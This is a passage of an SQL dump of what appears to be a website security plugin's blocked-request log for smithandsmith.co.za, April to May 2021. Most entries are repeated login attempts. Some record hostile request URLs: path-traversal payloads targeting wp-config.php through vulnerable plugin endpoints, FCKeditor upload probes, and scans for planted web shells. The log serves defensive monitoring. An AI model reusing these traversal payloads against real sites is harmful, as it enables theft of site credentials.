12:14:46','185.100.87.250','https://smithandsmith.co.za/wp-login.php','404shield',''),(3655,'2021-04-15 17:35:43','80.251.219.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(3656,'2021-04-15 17:35:44','80.251.219.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(3657,'2021-04-15 19:05:21','198.73.50.66','https://smithandsmith.co.za/wp-login.php','404shield',''),(3658,'2021-04-15 19:05:25','198.73.50.66','https://smithandsmith.co.za/wp-login.php','404shield',''),(3659,'2021-04-15 19:05:27','198.73.50.66','https://smithandsmith.co.za/wp-login.php','404shield',''),(3660,'2021-04-16 06:59:20','139.59.236.46','https://smithandsmith.co.za/wp-login.php','404shield',''),(3661,'2021-04-16 07:27:19','34.236.202.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(3662,'2021-04-16 16:09:11','13.124.222.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(3663,'2021-04-17 08:29:39','52.30.16.188','https://smithandsmith.co.za/wp-login.php','404shield',''),(3664,'2021-04-17 11:35:47','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3665,'2021-04-17 11:35:49','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3666,'2021-04-17 11:35:51','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3667,'2021-04-17 17:04:26','35.181.112.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(3668,'2021-04-18 04:29:51','162.144.232.224','https://smithandsmith.co.za/wp-login.php','404shield',''),(3669,'2021-04-18 07:23:59','162.219.250.31','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3670,'2021-04-18 11:03:29','13.234.2.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(3671,'2021-04-18 11:06:24','54.218.77.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(3672,'2021-04-18 13:39:13','34.209.105.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(3673,'2021-04-19 09:24:28','202.131.224.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(3674,'2021-04-19 17:15:16','160.119.253.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(3675,'2021-04-19 17:15:16','160.119.253.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(3676,'2021-04-19 20:13:55','40.87.70.212','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(3677,'2021-04-19 20:14:16','40.87.70.212','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php.suspected?test=hello','404shield',''),(3678,'2021-04-20 08:12:51','178.159.37.63','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3679,'2021-04-20 13:37:14','13.124.222.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(3680,'2021-04-20 16:35:55','107.161.177.66','https://smithandsmith.co.za/wp-login.php','404shield',''),(3681,'2021-04-20 20:22:39','107.189.30.86','https://smithandsmith.co.za/wp-login.php','404shield',''),(3682,'2021-04-20 20:22:42','107.189.30.86','https://smithandsmith.co.za/wp-login.php','404shield',''),(3683,'2021-04-20 20:22:44','107.189.30.86','https://smithandsmith.co.za/wp-login.php','404shield',''),(3684,'2021-04-21 00:15:15','45.148.4.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(3685,'2021-04-21 00:15:18','45.148.4.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(3686,'2021-04-21 00:15:19','45.148.4.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(3687,'2021-04-21 07:41:30','46.101.95.65','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3688,'2021-04-21 09:07:52','54.250.87.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(3689,'2021-04-21 13:48:19','109.70.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3690,'2021-04-21 13:48:21','109.70.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3691,'2021-04-21 13:48:23','109.70.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3692,'2021-04-22 03:45:50','67.222.130.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(3693,'2021-04-22 15:05:16','213.9.217.107','https://smithandsmith.co.za/wp-login.php','404shield',''),(3694,'2021-04-23 04:57:33','82.145.241.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(3695,'2021-04-23 11:27:26','52.42.79.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(3696,'2021-04-23 17:28:17','107.161.177.66','https://smithandsmith.co.za/wp-login.php','404shield',''),(3697,'2021-04-24 07:30:35','46.19.141.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(3698,'2021-04-24 07:30:38','46.19.141.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(3699,'2021-04-24 07:30:41','46.19.141.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(3700,'2021-04-24 10:52:32','178.32.123.111','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php','404shield',''),(3701,'2021-04-24 10:52:32','178.32.123.111','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php','404shield',''),(3702,'2021-04-24 10:52:33','178.32.123.111','https://smithandsmith.co.za/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php','404shield',''),(3703,'2021-04-24 16:06:50','94.23.5.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(3704,'2021-04-24 16:10:04','42.194.187.114','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3705,'2021-04-25 02:45:41','109.70.100.60','https://smithandsmith.co.za/wp-login.php','404shield',''),(3706,'2021-04-25 02:45:43','109.70.100.60','https://smithandsmith.co.za/wp-login.php','404shield',''),(3707,'2021-04-25 02:45:45','109.70.100.60','https://smithandsmith.co.za/wp-login.php','404shield',''),(3708,'2021-04-25 07:58:37','52.154.76.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(3709,'2021-04-25 10:08:25','23.95.164.188','https://smithandsmith.co.za/wp-login.php','404shield',''),(3710,'2021-04-25 15:35:26','162.221.189.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3711,'2021-04-26 16:19:32','52.186.169.219','https://smithandsmith.co.za/wp-login.php','404shield',''),(3712,'2021-04-26 16:19:32','52.186.169.219','https://smithandsmith.co.za/wp-login.php','404shield',''),(3713,'2021-04-26 18:44:41','185.220.101.206','https://smithandsmith.co.za/wp-login.php','404shield',''),(3714,'2021-04-26 18:44:43','185.220.101.206','https://smithandsmith.co.za/wp-login.php','404shield',''),(3715,'2021-04-26 18:44:45','185.220.101.206','https://smithandsmith.co.za/wp-login.php','404shield',''),(3716,'2021-04-26 22:53:16','104.244.72.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(3717,'2021-04-26 22:53:19','104.244.72.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(3718,'2021-04-26 22:53:21','104.244.72.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(3719,'2021-04-27 10:28:25','51.210.80.127','https://smithandsmith.co.za/wp-login.php','404shield',''),(3720,'2021-04-27 10:28:29','51.210.80.127','https://smithandsmith.co.za/wp-login.php','404shield',''),(3721,'2021-04-27 10:28:31','51.210.80.127','https://smithandsmith.co.za/wp-login.php','404shield',''),(3722,'2021-04-27 18:29:00','82.208.189.233','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3723,'2021-04-28 06:06:11','125.212.221.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(3724,'2021-04-28 14:50:34','5.255.174.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(3725,'2021-04-28 15:58:55','51.75.122.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(3726,'2021-04-28 15:58:57','51.75.122.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(3727,'2021-04-28 15:59:00','51.75.122.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(3728,'2021-04-28 16:50:15','80.253.246.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3729,'2021-04-28 19:08:48','208.109.8.126','https://smithandsmith.co.za/wp-login.php','404shield',''),(3730,'2021-04-29 00:25:43','185.46.121.66','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3731,'2021-04-29 12:41:59','185.220.100.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(3732,'2021-04-29 12:42:02','185.220.100.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(3733,'2021-04-29 12:42:06','185.220.100.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(3734,'2021-04-29 15:33:20','156.234.95.135','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3735,'2021-04-29 15:33:21','156.234.95.135','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3736,'2021-04-29 15:33:25','156.234.95.135','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3737,'2021-04-30 05:40:58','185.130.44.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(3738,'2021-04-30 05:41:00','185.130.44.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(3739,'2021-04-30 05:41:02','185.130.44.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(3740,'2021-04-30 05:41:09','199.249.230.175','https://smithandsmith.co.za/wp-login.php','404shield',''),(3741,'2021-04-30 07:15:24','103.56.55.158','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3742,'2021-04-30 07:15:25','103.56.55.158','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3743,'2021-04-30 07:15:26','103.56.55.158','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3744,'2021-05-01 13:32:19','109.70.100.52','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3745,'2021-05-01 13:32:20','109.70.100.52','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3746,'2021-05-01 13:32:20','109.70.100.52','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3747,'2021-05-02 07:56:03','72.167.222.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3748,'2021-05-03 03:36:09','206.189.231.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3749,'2021-05-03 08:50:36','103.143.142.249','https://smithandsmith.co.za/wp-login.php','404shield',''),(3750,'2021-05-03 11:13:28','167.88.170.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3751,'2021-05-03 14:02:53','159.89.1.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3752,'2021-05-03 14:02:53','159.89.1.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(3753,'2021-05-04 12:17:17','3.8.68.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3754,'2021-05-04 17:39:47','198.12.250.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(3755,'2021-05-05 00:02:56','185.246.209.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(3756,'2021-05-05 05:55:19','185.100.87.202','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3757,'2021-05-05 05:55:23','185.100.87.202','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(3758,'2021-05-05 05:55:25','185.100.87.202','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3759,'2021-05-05 20:39:00','178.79.191.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(3760,'2021-05-05 20:39:00','178.79.191.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(3761,'2021-05-06 14:10:05','157.245.243.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(3762,'2021-05-06 14:14:06','185.220.101.133','https://smithandsmith.co.za/wp-login.php','404shield',''),(3763,'2021-05-06 14:14:10','185.220.101.133','https://smithandsmith.co.za/wp-login.php','404shield',''),(3764,'2021-05-06 14:14:13','185.220.101.133','https://smithandsmith.co.za/wp-login.php','404shield',''),(3765,'2021-05-06 14:44:01','51.38.190.92','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3766,'2021-05-06 19:03:20','176.10.104.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(3767,'2021-05-06 19:03:23','176.10.104.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(3768,'2021-05-06 19:03:28','176.10.104.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(3769,'2021-05-06 19:03:45','185.220.101.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3770,'2021-05-06 19:03:55','185.220.101.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3771,'2021-05-07 09:19:28','162.247.74.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3772,'2021-05-07 09:19:30','162.247.74.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3773,'2021-05-07 09:19:33','162.247.74.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3774,'2021-05-07 10:31:13','34.236.55.223','https://smithandsmith.co.za/wp-login.php','404shield',''),(3775,'2021-05-07 12:56:50','185.220.101.151','https://www.smithandsmith.co.za/wp-content/plugins/hello.php','404shield',''),(3776,'2021-05-07 14:46:35','173.249.35.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(3777,'2021-05-07 14:51:13','185.220.100.242','https://www.smithandsmith.co.za/error_log.php','httpbl',''),(3778,'2021-05-07 15:32:52','162.210.195.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(3779,'2021-05-07 18:18:25','185.220.100.240','https://www.smithandsmith.co.za/config.php','httpbl',''),(3780,'2021-05-07 18:50:20','185.100.87.243','https://www.smithandsmith.co.za/wp-content/uploads/cache.php','404shield',''),(3781,'2021-05-07 19:53:29','91.219.237.21','https://www.smithandsmith.co.za/web-info.php','httpbl',''),(3782,'2021-05-07 20:23:39','185.100.87.240','https://www.smithandsmith.co.za/wp-content/uploads/info.php','404shield',''),(3783,'2021-05-07 23:43:46','171.25.193.25','https://www.smithandsmith.co.za/wp-content/themes/twentyfourteen/404.php','httpbl',''),(3784,'2021-05-08 00:20:04','199.249.230.181','https://www.smithandsmith.co.za/wp-content/plugins/info.php','404shield',''),(3785,'2021-05-08 02:44:08','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(3786,'2021-05-08 02:44:11','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(3787,'2021-05-08 02:44:14','185.220.101.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(3788,'2021-05-08 03:40:47','185.220.101.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3789,'2021-05-08 03:40:49','185.220.101.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3790,'2021-05-08 03:40:51','185.220.101.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3791,'2021-05-08 04:28:06','45.141.159.63','https://www.smithandsmith.co.za/wp-content/uploads/content-wrapper.php','404shield',''),(3792,'2021-05-08 06:14:32','178.20.55.18','https://www.smithandsmith.co.za/wp-content/uploads/config.php','404shield',''),(3793,'2021-05-08 06:48:36','185.107.47.215','https://www.smithandsmith.co.za/wp-content/themes/twentythirteen/404.php','404shield',''),(3794,'2021-05-08 07:17:47','185.56.80.65','https://www.smithandsmith.co.za/wp-content/load.php','404shield',''),(3795,'2021-05-08 08:19:30','104.244.73.46','https://www.smithandsmith.co.za/wp-content/themes/twentyeleven/404.php','404shield',''),(3796,'2021-05-08 08:50:23','109.70.100.49','https://www.smithandsmith.co.za/wp-content/plugins/thumbs.php','404shield',''),(3797,'2021-05-08 09:21:02','128.31.0.13','https://www.smithandsmith.co.za/wp-content/plugins/revslider/temp/update_extract/revslider/info.php','404shield',''),(3798,'2021-05-08 10:52:46','185.220.102.242','https://www.smithandsmith.co.za/wp-content/themes/twentyten/404.php','404shield',''),(3799,'2021-05-08 17:25:47','23.129.64.204','https://www.smithandsmith.co.za/index2.php','httpbl',''),(3800,'2021-05-08 19:15:22','91.219.236.197','https://www.smithandsmith.co.za/wp-content/uploads/img.php','404shield',''),(3801,'2021-05-09 00:01:25','169.239.106.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(3802,'2021-05-09 02:09:36','184.154.116.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(3803,'2021-05-09 04:29:41','80.253.246.19','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3804,'2021-05-09 13:21:41','81.6.43.167','https://www.smithandsmith.co.za/wp-content/themes/twentyfourteen/info.php','404shield',''),(3805,'2021-05-09 14:23:23','171.25.193.20','https://www.smithandsmith.co.za/logs.php','httpbl',''),(3806,'2021-05-09 17:05:22','185.220.102.241','https://www.smithandsmith.co.za/wp-content/uploads/shwso.php','404shield',''),(3807,'2021-05-09 17:36:40','5.199.143.202','https://www.smithandsmith.co.za/wp-content/uploads/maink.php','404shield',''),(3808,'2021-05-09 17:53:28','82.165.117.55','https://smithandsmith.co.za/wp-content/db-cache.php','404shield',''),(3809,'2021-05-09 17:54:10','82.165.117.55','https://smithandsmith.co.za/wp-content/db-cache.php','404shield',''),(3810,'2021-05-09 18:06:52','51.77.39.255','https://www.smithandsmith.co.za/wp-content/themes/twentyfifteen/404.php','404shield',''),(3811,'2021-05-09 19:44:37','91.219.236.197','https://www.smithandsmith.co.za/wp-content/uploads/maink2.php','404shield',''),(3812,'2021-05-09 22:11:00','185.220.100.242','https://www.smithandsmith.co.za/wp-content/uploads/mainik.php','404shield',''),(3813,'2021-05-10 14:25:02','3.8.68.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3814,'2021-05-11 16:43:32','199.188.200.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(3815,'2021-05-11 16:43:32','199.188.200.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(3816,'2021-05-12 19:48:49','34.64.218.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3817,'2021-05-12 19:48:49','34.64.218.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3818,'2021-05-13 02:01:30','45.116.13.226','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3819,'2021-05-13 02:01:31','45.116.13.226','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3820,'2021-05-13 02:01:33','45.116.13.226','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3821,'2021-05-13 18:04:07','159.65.225.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(3822,'2021-05-13 19:49:08','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3823,'2021-05-13 19:49:11','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3824,'2021-05-13 19:49:13','176.10.99.200','https://smithandsmith.co.za/wp-login.php','404shield',''),(3825,'2021-05-13 20:20:18','5.182.209.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(3826,'2021-05-13 21:28:23','95.173.161.167','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3827,'2021-05-13 23:52:27','185.12.45.118','https://smithandsmith.co.za/wp-login.php','404shield',''),(3828,'2021-05-13 23:52:30','185.12.45.118','https://smithandsmith.co.za/wp-login.php','404shield',''),(3829,'2021-05-13 23:52:32','185.12.45.118','https://smithandsmith.co.za/wp-login.php','404shield',''),(3830,'2021-05-14 15:24:13','89.163.243.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(3831,'2021-05-14 15:24:15','89.163.243.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(3832,'2021-05-14 15:24:17','89.163.243.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(3833,'2021-05-14 15:24:25','192.160.102.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(3834,'2021-05-14 21:36:32','149.202.238.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(3835,'2021-05-14 21:36:36','149.202.238.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(3836,'2021-05-14 21:36:47','149.202.238.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(3837,'2021-05-15 10:57:23','36.66.156.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3838,'2021-05-15 21:45:05','198.50.136.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(3839,'2021-05-16 03:27:44','1.116.151.223','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3840,'2021-05-16 04:39:22','109.70.100.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3841,'2021-05-16 04:39:25','109.70.100.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3842,'2021-05-16 04:39:27','109.70.100.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3843,'2021-05-16 05:29:00','210.212.250.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(3844,'2021-05-16 06:03:20','35.216.220.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3845,'2021-05-16 08:41:06','91.185.211.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(3846,'2021-05-16 13:08:06','35.228.237.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(3847,'2021-05-16 14:10:56','210.212.250.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(3848,'2021-05-16 18:20:59','31.207.33.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(3849,'2021-05-16 18:37:58','91.134.254.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(3850,'2021-05-16 23:09:39','157.245.111.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(3851,'2021-05-17 00:44:32','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3852,'2021-05-17 00:44:34','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3853,'2021-05-17 00:44:36','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3854,'2021-05-17 05:58:46','18.194.196.202','https://smithandsmith.co.za/wp-login.php','404shield',''),(3855,'2021-05-17 17:09:47','79.135.82.11','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(3856,'2021-05-17 22:31:02','188.166.214.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(3857,'2021-05-17 22:31:03','188.166.214.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(3858,'2021-05-18 20:07:13','209.190.39.114','http://www.smithandsmith.co.za/','muashield',''),(3859,'2021-05-18 20:07:13','209.190.39.114','http://www.smithandsmith.co.za/','muashield',''),(3860,'2021-05-18 20:07:16','209.190.39.114','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(3861,'2021-05-19 05:24:32','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3862,'2021-05-19 05:24:34','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3863,'2021-05-19 05:24:36','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3864,'2021-05-19 06:15:32','173.212.205.58','https://smithandsmith.co.za/wp-login.php','404shield',''),(3865,'2021-05-19 07:02:28','103.147.251.2','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3866,'2021-05-19 13:34:08','45.116.13.226','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3867,'2021-05-19 13:34:09','45.116.13.226','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3868,'2021-05-19 13:34:10','45.116.13.226','http://smithandsmith.co.za/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','dfishield',''),(3869,'2021-05-19 18:37:25','72.167.42.45','https://smithandsmith.co.za/wp-login.php','404shield',''),(3870,'2021-05-20 09:44:14','188.163.88.59','http://smithandsmith.co.za/administrator/','adminpw',''),(3871,'2021-05-20 09:44:16','188.163.88.59','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3872,'2021-05-20 09:44:18','188.163.88.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(3873,'2021-05-20 09:44:24','185.220.100.255','http://smithandsmith.co.za/administrator/','adminpw',''),(3874,'2021-05-20 09:44:26','185.220.100.255','http://smithandsmith.co.za/','httpbl',''),(3875,'2021-05-20 09:44:27','185.220.100.255','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3876,'2021-05-20 09:44:30','31.42.184.136','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3877,'2021-05-20 09:44:32','31.42.184.136','http://smithandsmith.co.za/wp-admin/','httpbl',''),(3878,'2021-05-20 09:44:43','185.220.101.137','http://smithandsmith.co.za/admin','httpbl',''),(3879,'2021-05-20 09:44:48','91.219.237.21','http://smithandsmith.co.za/admin/','httpbl',''),(3880,'2021-05-20 23:02:05','185.158.175.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(3881,'2021-05-20 23:02:05','185.158.175.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(3882,'2021-05-21 22:19:53','51.195.166.162','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3883,'2021-05-21 22:19:56','51.195.166.162','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3884,'2021-05-21 22:19:59','51.195.166.162','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3885,'2021-05-22 05:36:53','52.52.190.187','https://smithandsmith.co.za/wp-login.php','404shield',''),(3886,'2021-05-22 18:17:31','147.135.138.199','https://smithandsmith.co.za/wp-login.php','404shield',''),(3887,'2021-05-22 21:10:57','173.236.145.183','https://smithandsmith.co.za/wp-login.php','404shield',''),(3888,'2021-05-23 00:28:22','185.220.101.207','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3889,'2021-05-23 00:28:24','185.220.101.207','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3890,'2021-05-23 00:28:26','185.220.101.207','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3891,'2021-05-23 07:09:38','45.159.196.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(3892,'2021-05-23 16:44:59','185.49.20.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3893,'2021-05-23 16:44:59','185.49.20.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3894,'2021-05-23 16:45:00','185.49.20.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3895,'2021-05-23 16:45:00','185.49.20.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(3896,'2021-05-23 19:54:23','208.109.14.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(3897,'2021-05-24 12:51:57','95.79.142.255','http://smithandsmith.co.za/administrator/','adminpw',''),(3898,'2021-05-24 12:52:05','95.79.142.255','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3899,'2021-05-24 12:52:18','95.79.142.255','https://smithandsmith.co.za/wp-login.php','404shield',''),(3900,'2021-05-24 12:52:39','45.133.1.63','http://smithandsmith.co.za/administrator/','adminpw',''),(3901,'2021-05-24 12:52:50','185.191.124.143','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3902,'2021-05-24 12:53:05','109.70.100.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(3903,'2021-05-24 12:53:23','31.42.184.136','http://smithandsmith.co.za/admin','httpbl',''),(3904,'2021-05-24 20:07:25','51.178.53.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3905,'2021-05-24 20:07:25','51.178.53.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(3906,'2021-05-24 23:54:53','82.165.117.55','https://smithandsmith.co.za/wp-content/db-cache.php','404shield',''),(3907,'2021-05-24 23:55:18','82.165.117.55','https://smithandsmith.co.za/wp-content/db-cache.php','404shield',''),(3908,'2021-05-25 03:41:47','5.29.20.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(3909,'2021-05-25 06:41:22','13.58.56.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(3910,'2021-05-25 14:53:55','89.234.157.254','https://smithandsmith.co.za/wp-login.php','404shield',''),(3911,'2021-05-25 14:53:57','89.234.157.254','https://smithandsmith.co.za/wp-login.php','404shield',''),(3912,'2021-05-25 14:53:59','89.234.157.254','https://smithandsmith.co.za/wp-login.php','404shield',''),(3913,'2021-05-25 18:19:09','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/synoptic/lib/avatarupload/upload.php','404shield',''),(3914,'2021-05-26 01:24:40','142.93.216.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(3915,'2021-05-26 01:24:40','142.93.216.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(3916,'2021-05-26 06:10:58','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/jquery-html5-file-upload/readme.txt','404shield',''),(3917,'2021-05-26 12:42:35','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3918,'2021-05-26 12:42:38','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3919,'2021-05-26 12:42:41','51.15.235.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3920,'2021-05-26 12:42:48','198.144.120.177','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3921,'2021-05-26 